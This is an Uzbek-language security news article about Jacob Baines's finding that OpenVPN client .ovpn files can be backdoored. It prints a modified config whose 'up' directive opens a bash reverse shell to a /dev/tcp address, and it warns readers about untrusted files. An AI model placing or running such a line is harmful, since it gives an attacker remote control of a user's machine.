OpenVPN mijozining sozlash fayllaridan orqa eshiklar (backdoors) o‘rnatish uchun foydalanish mumkin.

OpenVPN mijozining sozlash fayllaridan orqa eshiklar (backdoors) o‘rnatish uchun foydalanish mumkin.

OpenVPN mijozining sozlash fayllaridan orqa eshiklar (backdoors) o‘rnatish uchun foydalanish mumkin.

Hujumchi bor-yo‘g‘i bir necha qator kod qo‘shish orqali xavfsiz konfiguratsiya faylini zararli faylga aylantirishi mumkin.


Kiberxavfsizlik bo‘yicha mutaxassislar ishonchsiz manbalardan kontent yuklab olish xavflari haqida qayta-qayta ogohlantirib kelishadi, chunki bunday fayllarning ko‘pchiligi zararli kod, keraksiz reklama dasturlari yoki kompyuterda zararli harakatlarni amalga oshiruvchi skriptlarni o‘z ichiga olishi mumkin. Tadqiqotchi Jeykob Beyns (Jacob Baines) oddiy OpenVPN mijoz konfiguratsiya fayli (.ovpn) yordamida VPN ulanishi o‘rnatilgandan so‘ng kompyuterda buyruqlarni qanday bajarish mumkinligini namoyish etdi.

Beynsning ta’kidlashicha, hujumchilar xavfsiz konfiguratsiya faylini zararli faylga aylantirish uchun atigi bir necha qator kod qo‘shishlari kifoya qiladi. Tadqiqotchi keltirgan misolda konfiguratsiya fayli quyidagicha ko‘rinishga ega:

remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun

Agar hujumchi biror buyruqni bajarishi kerak bo‘lsa, u `script-security 2` qatorini (bu OpenVPN-ga foydalanuvchi tomonidan belgilangan skriptlarni bajarishga ruxsat beradi) hamda ulanish o‘rnatilgandan so‘ng bajariladigan buyruqni o‘z ichiga olgan `up` direktivasini qo‘shishi mumkin.

remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i >/dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Bu hujumchiga OpenVPN konfiguratsiya fayli ishlayotgan kompyuterda masofadan turib buyruqlarni bajarish imkonini beradi.

Mutaxassisning taʼkidlashicha, ushbu usuldan PowerShell skripti yordamida Windows asosidagi kompyuterlarga hujum qilishda ham foydalanish mumkin. Hujum usuli haqida batafsil maʼlumot bu yerda keltirilgan.

Garchi Beyns (Baines) o‘zi tasvirlagan usulning amalda qo‘llanilgan holatlariga hali duch kelmagan bo‘lsa-da, u foydalanuvchilarni ishonchsiz .ovpn fayllariga nisbatan ehtiyotkor bo‘lishga yoki bunday hujumlar xavfini kamaytiruvchi OpenVPN mijoz dasturlaridan (masalan, Viscosity) foydalanishga chaqirdi.

OpenVPN — bu kompyuterlar o‘rtasida shifrlangan «nuqtadan-nuqtaga» (point-to-point) yoki «server-mijoz» (server-client) tunnellarini yaratish uchun qo‘llaniladigan virtual xususiy tarmoq (VPN) texnologiyasining ochiq kodli dasturiy taʼminotidir. U NAT va xavfsizlik devorlari (firewall) ortida joylashgan kompyuterlar o‘rtasida, ularning sozlamalarini o‘zgartirish talab etilmagan holda, ulanish o‘rnatish imkonini beradi.

O‘xshash maqolalar